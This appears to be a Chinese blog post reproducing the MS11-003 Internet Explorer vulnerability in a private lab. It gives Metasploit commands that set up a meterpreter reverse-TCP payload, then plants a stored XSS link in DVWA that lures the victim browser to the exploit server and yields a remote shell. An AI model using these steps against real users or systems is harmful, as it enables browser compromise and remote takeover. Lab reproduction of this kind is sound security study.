MS11_003漏洞复现

86 阅读1分钟

持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第3天
10月更文诚意加码,激发写作潜力|掘金·日新计划 - 掘金 (juejin.cn)点击查看活动详情

 渗透机kali     192.168.1.11

靶机win7       192.168.1.8

服务器win08  192.168.1.9

kali使用命令msfconsole启动渗透平台,使用命令search windows/browser/ms11_003_ie_css_import

搜索ms11_003模块

use选择该模块

Show options

Set payload windows/meterpreter/reverse_tcp设置载荷模块

Set SRVHOST 192.168.1.11 设置本地监听ip

Set URIPATH ui 设置访问模块的具体地址(默认随机生成)

Set LHOST 192.168.1.11 设置载荷模块监听本地地址

设置模块目标,使用命令show targets查看支持的目标列表,使用命令set target1设置目标地址为Internet Explorer 8

设置好了,使用命令exploit -j后台启动模块,等待连接

kali输入命令firefox进入火狐浏览器

输入账号admin密码password进入DVWA网站

找到DVWA security 设置low 点击submit进行提交

在左边导航栏找到xxs(stored)   F12打开审查元素切换到查看器Inspector搜索maxlength将后面的值改成500,也就是将最长长度改成了500

在name框输入test

在mesage框中输入 Click to Download

使用用靶机的浏览器访问该站点

先降低防护性为low

在左侧点击xss(stored),再点击网页上的Click to Download

回到kali发现上线了一个会话

使用命令sessions -i切换到会话2,使用shell开启终端

输入命令:chcp 65001将乱码改回正确的样式

成功拿shell